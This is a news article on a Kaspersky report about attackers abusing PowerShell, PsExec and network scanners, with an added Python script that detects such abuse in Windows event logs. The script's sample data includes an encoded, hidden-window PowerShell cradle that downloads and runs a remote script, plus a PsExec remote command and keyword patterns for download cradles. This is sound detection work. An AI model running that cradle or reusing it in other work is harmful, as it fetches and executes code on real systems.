Cybercriminals make widespread use of software built for ordinary user activity, administrator tasks and system diagnostics, so that their actions blend in with routine operations and are not caught quickly after an attack, warns a new report by cybersecurity firm Kaspersky.
Almost a third of cyber attacks that the Kaspersky Global Emergency Response team investigated in 2019 involved legitimate remote management and administration tools.
In total, the analysis of anonymised data from incident response cases showed that 18 different legitimate tools were abused by attackers for malicious purposes, according to the company's new 'Incident Response Analytics Report'.
The most widely used one was PowerShell. This powerful administration tool can be used for many purposes, from gathering information to running malware.
Another tool, PsExec, was leveraged in 22 per cent of the attacks. This console application is intended for launching processes on remote endpoints.
This was followed by SoftPerfect Network Scanner, which is intended to retrieve information about network environments.
It is more difficult for security solutions to detect attacks conducted with legitimate tools because the same actions can be either part of a planned attack or a routine system administration task; the tool alone does not tell the two apart.
“With these tools, attackers can gather information about corporate networks and then conduct lateral movement, change software and hardware settings or even carry out some form of malicious action,” Konstantin Sapronov, Head of Global Emergency Response Team at Kaspersky, said in a statement.
“It is not possible to exclude these tools for many reasons; however, properly deployed logging and monitoring systems will help to detect suspicious activity in the network and complex attacks at earlier stages,” Sapronov said.
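As an added illustration of the logging and monitoring Sapronov describes (example code written for this page, not Kaspersky's or the report's), the following Python script runs a few detection rules over Windows event records for the three tools named above. The event records, the host and account names, the allowlist of admin hosts and accounts, and the download URL are all constructed for the example; the event IDs (7045 for a service installed, 4688 for a process created), the default PSEXESVC service name and the netscan.exe binary name are the standard Windows, PsExec and SoftPerfect values.

```python
"""Detection rules for abuse of legitimate admin tools (PsExec, PowerShell,
SoftPerfect Network Scanner) over Windows event records.

All events, hosts, accounts and URLs below are constructed for this example.
"""
import base64
import re

# Where admin tooling is expected to run. Constructed; in practice this is the
# inventory of jump hosts and the membership of the admin groups.
ALLOWED_ADMIN_HOSTS = {"JUMP01"}
ALLOWED_ADMIN_ACCOUNTS = {"CORP\\svc-deploy"}

# A constructed download cradle, encoded the way "powershell -enc" expects it
# (UTF-16LE text, then base64).
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.9/a.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed sample events. Field names mirror the Windows event data fields
# (7045: a service was installed; 4688: a new process was created).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "FS02", "SubjectUserName": "CORP\\jdoe",
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4688, "Computer": "WS17", "SubjectUserName": "CORP\\jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_CRADLE},
    {"EventID": 4688, "Computer": "JUMP01", "SubjectUserName": "CORP\\svc-deploy",
     "NewProcessName": r"C:\Tools\PsExec.exe",
     "CommandLine": r"PsExec.exe \\FS02 -s cmd /c sc query"},
    {"EventID": 4688, "Computer": "WS17", "SubjectUserName": "CORP\\jdoe",
     "NewProcessName": r"C:\Users\jdoe\Downloads\netscan.exe",
     "CommandLine": "netscan.exe /range:10.0.0.1-10.0.0.254"},
    {"EventID": 4688, "Computer": "JUMP01", "SubjectUserName": "CORP\\svc-deploy",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\patch.ps1"},
]

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_SCRIPT = re.compile(r"(?i)downloadstring|invoke-expression|\biex\b|frombase64string")


def decode_encoded_command(cmdline):
    """Return the script hidden in a PowerShell -EncodedCommand, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return None
    return raw.decode("utf-16le", errors="replace")


def analyse(event):
    """Match one event against the tool-abuse rules; return (rule, detail) or None."""
    eid = event.get("EventID")
    if eid == 7045:
        svc = (event.get("ServiceName", "") + event.get("ImagePath", "")).upper()
        # Default PsExec service name. "PsExec -r" renames it, so a full rule also
        # baselines every new service whose binary sits directly in %SystemRoot%.
        if "PSEXESVC" in svc:
            return "psexec_service_install", event.get("ImagePath", "")
    if eid == 4688:
        exe = event.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
        cmd = event.get("CommandLine", "")
        if exe in ("psexec.exe", "psexec64.exe"):
            return "psexec_launch", cmd
        if exe in ("powershell.exe", "pwsh.exe"):
            script = decode_encoded_command(cmd)
            if script is not None:
                if SUSPICIOUS_SCRIPT.search(script):
                    return "powershell_encoded_download", script
                return "powershell_encoded", script
        if exe == "netscan.exe":                     # SoftPerfect Network Scanner binary
            return "network_scanner", cmd
    return None


def in_expected_context(event):
    """True when the event comes from an allowlisted admin host and account."""
    return (event.get("Computer") in ALLOWED_ADMIN_HOSTS
            and event.get("SubjectUserName") in ALLOWED_ADMIN_ACCOUNTS)


def detect(events):
    """Run the rules; the same tool is 'info' from an admin context, 'high' elsewhere."""
    findings = []
    for ev in events:
        hit = analyse(ev)
        if hit is None:
            continue
        rule, detail = hit
        severity = "info" if in_expected_context(ev) else "high"
        if rule == "powershell_encoded_download":
            severity = "high"   # a download cradle is suspect whoever runs it
        findings.append({"host": ev.get("Computer"), "user": ev.get("SubjectUserName"),
                         "rule": rule, "severity": severity, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']:4}] {f['host']} {f['user']} {f['rule']}: {f['detail'][:60]}")
```

The point of the allowlist is the one the report makes: PsExec launched from the jump host by the deployment account and PsExec launched from a workstation by an ordinary user match the same rule, and only the context (host, account, and for PowerShell what the encoded script actually does) separates routine administration from lateral movement. Two caveats for anyone adapting this to real logs: 4688 events only carry the command line when the "Include command line in process creation events" policy is enabled, and PsExec's -r option changes the service name, so the 7045 rule should be backed by a baseline of known services rather than the PSEXESVC string alone.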
To minimise the chances of remote management software being used to penetrate an infrastructure, organisations should restrict access to remote management tools from external IP addresses, the company recommended.
Moreover, they need to ensure that remote control interfaces can only be accessed from a limited number of endpoints, enforce a strict password policy for all IT systems and deploy multi-factor authentication, Kaspersky said.
Staff should be given only the privileges their work requires, with highly privileged accounts granted solely to those who need them to do their job.